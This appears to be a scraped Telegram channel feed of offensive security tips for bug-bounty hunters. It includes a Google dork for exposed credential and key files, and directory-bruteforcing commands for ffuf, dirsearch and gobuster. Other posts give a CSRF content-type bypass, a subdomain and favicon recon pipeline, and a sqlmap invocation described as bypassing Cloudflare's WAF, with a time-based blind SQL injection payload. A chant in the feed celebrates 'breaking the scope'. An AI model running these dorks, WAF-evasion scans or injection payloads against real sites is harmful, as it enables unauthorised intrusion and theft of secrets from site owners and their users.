FileFetcher is a Python tool that extracts and filters URLs from archived Wayback Machine data based on file types like .pdf, .zip, .sql, and more. It checks the availability of each URL, saving valid ones with a 200 OK response to a text file, ideal for research or web scraping.
https://github.com/shivangmauryaa/FileFetcher.git
https://github.com/shivangmauryaa/FileFetcher.git
GitHub
GitHub - shivangmauryaa/FileFetcher: FileFetcher is a Python tool that extracts and filters URLs from archived Wayback Machineโฆ
FileFetcher is a Python tool that extracts and filters URLs from archived Wayback Machine data based on file types like .pdf, .zip, .sql, and more. It checks the availability of each URL, saving va...
๐5๐ฅ1
Top 25 JavaScript path files used to store sensitive information in Web Application
01. /js/config.js
02. /js/credentials.js
03. /js/secrets.js
04. /js/keys.js
05. /js/password.js
06. /js/api_keys.js
07. /js/auth_tokens.js
08. /js/access_tokens.js
09. /js/sessions.js
10. /js/authorization.js
11. /js/encryption.js
12. /js/certificates.js
13. /js/ssl_keys.js
14. /js/passphrases.js
15. /js/policies.js
16. /js/permissions.js
17. /js/privileges.js
18. /js/hashes.js
19. /js/salts.js
20. /js/nonces.js
21. /js/signatures.js
22. /js/digests.js
23. /js/tokens.js
24. /js/cookies.js
25. /js/topsecr3tdonotlook.js
๐2โค1๐ฅ1
ExploitQuest
Top 25 JavaScript path files used to store sensitive information in Web Application 01. /js/config.js 02. /js/credentials.js 03. /js/secrets.js 04. /js/keys.js 05. /js/password.js 06. /js/api_keys.js 07. /js/auth_tokens.js 08. /js/access_tokens.js 09. /js/sessions.jsโฆ
Dork :
intitle:"index of" inurl:"/js/" ("config.js" | "credentials.js" | "secrets.js" | "keys.js" | "password.js" | "api_keys.js" | "auth_tokens.js" | "access_tokens.js" | "sessions.js" | "authorization.js" | "encryption.js" | "certificates.js" | "ssl_keys.js" | "passphrases.js" | "policies.js" | "permissions.js" | "privileges.js" | "hashes.js" | "salts.js" | "nonces.js" | "signatures.js" | "digests.js" | "tokens.js" | "cookies.js" | "topsecr3tdonotlook.js")โค4๐1
This media is not supported in your browser
VIEW IN TELEGRAM
- Are you ready, kids?
- Yes, !
- I can't hear you!
- Yes sir, !
- Whooo... who is burning out in front of the screen?
- BUG-HUNTER!
- A top hacker in hookah smoke?
- BUG-HUNTER!
- Who breaks the scope always and everywhere?
- BUG-HUNTER!
- Do you like to party in trendy merch?
- BUG-HUNTER!
- Skilled and dexterous, not a fan of discussions?
- BUG-HUNTER!
- Looking for crits without any illusions?
- BUG-HUNTER!
- Who writes a full report to the vendor?
- BUG-HUNTER!
- Sparing no effort during the nights of the narpolet?
- BUG-HUNTER!
- Who wants the maximum bounty payouts?
- BUG-HUNTER!
- All thanks to your brilliant ingenuity?
- BUG-HUN-TER! BUG-HUN-TER! BUG-HUN-TER! BUG-HUN-TEEEER!
- Yes, !
- I can't hear you!
- Yes sir, !
- Whooo... who is burning out in front of the screen?
- BUG-HUNTER!
- A top hacker in hookah smoke?
- BUG-HUNTER!
- Who breaks the scope always and everywhere?
- BUG-HUNTER!
- Do you like to party in trendy merch?
- BUG-HUNTER!
- Skilled and dexterous, not a fan of discussions?
- BUG-HUNTER!
- Looking for crits without any illusions?
- BUG-HUNTER!
- Who writes a full report to the vendor?
- BUG-HUNTER!
- Sparing no effort during the nights of the narpolet?
- BUG-HUNTER!
- Who wants the maximum bounty payouts?
- BUG-HUNTER!
- All thanks to your brilliant ingenuity?
- BUG-HUN-TER! BUG-HUN-TER! BUG-HUN-TER! BUG-HUN-TEEEER!
๐8๐3๐ซก3
ffuf -u http://target.com/FUZZ -w wordlist.txt -e .json,.xml,.bak,.sql,.zip,.log,.config,.env -c -t 50 -recursion -recursion-depth 2 -s -mc 200,301,302 -o results.json
โค9
What does the command do?
Searches for hidden or useful files or paths within the list of links. It is used in security testing to detect sensitive or exposed files on the server.
dirsearch -l urls.txt -e
conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx
~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,con
f,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,ol
d,sql,sql.gz,sql.zip,sql.tar.gz,sql~,swp,swp~,tar,t
ar.bz2,tar.gz,txt,wadl,zip,log,xml,js,json --deep-
recursive --force-recursive --exclude-sizes=0B --
random-agent --full-url -o output.txt
๐5๐ฅ4โค1
๐4๐1
This media is not supported in your browser
VIEW IN TELEGRAM
Bruteforce directories and files :
a simple example of using gobuster , but you can also work with ffuf , feroxbuster and other tools
โข dir : directory scanning mode
โข -u : target URL
โข -w : path to dictionary
Other useful parameters:
โข -x : file extensions ( .php , .html )
โข -t : number of threads
โข -c : cookie
a simple example of using gobuster , but you can also work with ffuf , feroxbuster and other tools
โข dir : directory scanning mode
โข -u : target URL
โข -w : path to dictionary
Other useful parameters:
โข -x : file extensions ( .php , .html )
โข -t : number of threads
โข -c : cookie
๐ฅ10
ExploitQuest
Photo
A simple CSRF bypass to check if your target is sending JSON data without an anti-CSRF token
Change the content type from application/json to text/plain and see if it still accepts the request
Steps to Check for CSRF Bypass
Identify the Target Request:
Find the endpoint that accepts JSON data and requires CSRF protection.
Capture the Request:
Use tools like Burp Suite, Postman, or browser developer tools to capture the original request.
Original Request (expected by the server):
POST /api/profile HTTP/2
Host: app.example.com
Cookie: sess=eyJ... # Session Cookie
Content-Type: application/json
{
"email": "test@example.com"
}
Modified Request (for testing CSRF bypass):
POST /api/profile HTTP/2
Host: app.example.com
Cookie: sess=eyJ... # Session Cookie
Content-Type: text/plain
{
"email": "test@example.com"
}
Expected Results:
If the server accepts the request:
The endpoint may not validate the Content-Type.
This can allow a malicious actor to exploit the endpoint using CSRF.
If the server rejects the request:
It validates the Content-Type, which is a good security practice.
This reduces the risk of CSRF exploitation
โค7๐2
One line to find all subdomains of a target site and list the favicon hashes.
The latter can be used in conjunction with Shodan to find all web applications using the same favicon.
The latter can be used in conjunction with Shodan to find all web applications using the same favicon.
subfinder -d canva.com | httpx -favicon -j | jq -r .favicon | grep -v null | sort-u
๐ฅ3
Bypass waf for SQL injection :)
cloudflare
command :
time-based blind:
cloudflare
command :
sqlmap -u "target.com" --dbs --batch --time-sec 10 --level 3 --hex --random-agent --tamper=space2comment,betweeny
time-based blind:
+AND+(SELECT+5140+FROM+(SELECT(SLEEP(10)))lfTO)
๐ฅ7๐4โค2